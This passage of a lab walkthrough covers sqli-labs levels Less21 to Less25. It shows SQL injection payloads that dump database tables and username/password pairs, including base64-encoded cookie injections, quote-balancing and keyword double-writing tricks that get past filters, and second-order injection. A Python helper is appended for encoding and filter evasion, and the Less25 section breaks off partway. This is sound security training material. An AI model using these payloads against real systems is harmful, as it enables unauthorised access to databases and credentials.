Decoding the cookie captured from the request didn't quite work at first. "%3D" is the URL encoding of "=", so the captured value is really YWRtaW4=, which base64-decodes to admin.
So for the injection we only need to base64-encode the payload before putting it into the cookie. Trying that, the injection point turns out to be ').
Each payload below is shown in clear text first, then as the base64 value that was actually sent in the cookie:
Cookie: uname=admin')#
Cookie: uname=YWRtaW4nKSM=
Cookie: uname=1') UNION SELECT 1,2,3#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsMyM=
Cookie: uname=1') UNION SELECT 1,2,database()#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZGF0YWJhc2UoKSM=
(At this point the author notes that an updatexml()-based error injection could be swapped in if the UNION query errored; the UNION payloads below are what was actually used.)
Cookie: uname=1') UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security'#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBXSEVSRSB0YWJsZV9zY2hlbWEgPSAnc2VjdXJpdHknIw==
Cookie: uname=1') UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users'#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgQU5EIHRhYmxlX25hbWUgPSAndXNlcnMnIw==
Cookie: uname=1') UNION SELECT 1,2,group_concat(concat(":",username,password)) FROM security.users#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbmNhdCgiOiIsdXNlcm5hbWUscGFzc3dvcmQpKSBGUk9NIHNlY3VyaXR5LnVzZXJzIw==

Less22
Essentially the same as Less21, except that the injection point is a double quote ".

Less23
?id=1 displays normally; ?id=1', ?id=1') and ?id=1')) all error. Appending a comment (--+ or #) still errors, so the guess is that the comment characters are being filtered. The workaround is to end the payload with a single quote of our own, which pairs with the closing quote the original query puts after our input and so terminates the statement cleanly. Testing with an always-true condition: ?id=1' or 1=1 or' displays normally, while ?id=1') or 1=1 or' and ?id=1')) or 1=1 or' error, so the injection point is '.
Find the column count / confirm UNION:
?id=-1' UNION SELECT 1,2,3 '
Dump the database name:
?id=-1' UNION SELECT 1,2,database() '
Dump the table names:
?id=-1' UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema='security' '
Dump the column names:
?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' and table_name='users' '
Dumping the data errored with this form:
?id=-1' UNION SELECT 1,2,group_concat(concat_ws(':',username,password)) FROM users'
The problem is syntax: our trailing ' and the query's own closing quote now sit as '' directly after the table name, and MySQL does not accept a string literal as a table alias (it does accept one as a column alias, which is why the earlier payloads ending in 3 ' went through). Moving the quote into a WHERE clause absorbs it, because the tail of the query becomes where '1'='1' followed by whatever the original query appends:
?id=-1' UNION SELECT 1,2,group_concat(concat_ws(':',username,password)) FROM users where '1'='1
This statement goes through successfully.

Less24
Injecting on the login form failed. Entering admin shows a page saying you can change the password. Going back to the main page and clicking "New User click here", register a new user named admin' and see what happens; returning to the main page, the login then succeeds (the classic second-order injection: the quote is stored harmlessly at registration and only becomes part of a query later).

Less25
The hint is explicit: all your 'or' and 'and' belong to us. As usual, start with ?id=1, ?id=1', ?id=1'), ?id=1" and ?id=1"). ?id=1' and ?id=1') error. Adding a comment, ?id=1'--+ and ?id=1')--+, ?id=1'--+ no longer errors, so the injection point is presumably '.
Following the hint that 'or' belongs to them, build an always-true condition with or: ?id=1' or 1=1--+ shows an error. So how do we use or without an error? Nest an or inside an or: if the inner or is stripped, the remaining characters reassemble into or, and the payload goes through.
Find the column count (note that order contains or and has to be doubled too):
?id=1' oorrder by 4--+
UNION query:
?id=-1' UNION SELECT 1,2,3--+
Dump the database name:
?id=-1' UNION SELECT 1,2,database()--+
Dump the table names (information_schema also contains or):
?id=-1' UNION SELECT 1,2,group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema = 'security'--+
Dump the column names
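The two payload transformations used on this page, the base64 cookie channel of Less21 and the keyword double-writing of Less25, as an added Python example; this is not code from the original write-up or from sqli-labs. The model of the Less25 filter (every occurrence of or and and deleted, case-insensitively, in one pass) is an assumption about the lab's implementation, inferred from the hint and from the fact that oorr survived. The cookie value and payloads are the ones shown above.

```python
import base64
import re
import urllib.parse


# Less21: the uname cookie carries base64(username); "=" padding arrives as %3D.
def decode_cookie(raw: str) -> str:
    """URL-decode, then base64-decode, a captured uname cookie value."""
    return base64.b64decode(urllib.parse.unquote(raw)).decode()


def encode_cookie(payload: str) -> str:
    """Base64-encode an injection payload so it can be sent as the uname cookie."""
    return base64.b64encode(payload.encode()).decode()


def cookie_header(payload: str) -> str:
    """Full header line, ready to paste into a repeater or curl -H."""
    return "Cookie: uname=" + encode_cookie(payload)


# Less25: assumed server-side filter (an assumption, modelled on the hint
# "all your 'or' and 'and' belong to us"): every occurrence of the two keywords
# is deleted, case-insensitively, in a single pass.
def strip_or_and(s: str) -> str:
    s = re.sub(r"or", "", s, flags=re.IGNORECASE)
    s = re.sub(r"and", "", s, flags=re.IGNORECASE)
    return s


def double_write(payload: str) -> str:
    """Rewrite each or/and as oorr/aandnd so that one deletion pass leaves the
    original keyword behind.  This also covers keywords hidden inside identifiers
    (order -> oorrder, information_schema -> infoorrmation_schema,
    password -> passwoorrd), which the filter would otherwise mangle."""
    def dup(m: re.Match) -> str:
        w = m.group(0)
        return w[0] + w + w[1:]   # "or" -> "o"+"or"+"r", "and" -> "a"+"and"+"nd"
    return re.sub(r"(?i)or|and", dup, payload)


def survives_filter(payload: str) -> bool:
    """True if the double-written payload comes out of the assumed filter intact."""
    return strip_or_and(double_write(payload)) == payload


if __name__ == "__main__":
    print(decode_cookie("YWRtaW4%3D"))
    for p in ("admin')#", "1') UNION SELECT 1,2,3#"):
        print(cookie_header(p))
    for p in ("1' or 1=1--+",
              "1' order by 4--+",
              "-1' UNION SELECT 1,2,group_concat(table_name) FROM "
              "information_schema.tables WHERE table_schema='security'--+"):
        print(strip_or_and(p), "|", double_write(p), "|", survives_filter(p))
```

The first loop reproduces the Cookie: lines listed under Less21; the second shows, for each Less25 payload, what the filter makes of the plain payload, the double-written form to send instead, and whether it round-trips. Since double_write rewrites the matched text itself, case is preserved, so OR becomes OORR and comes back as OR.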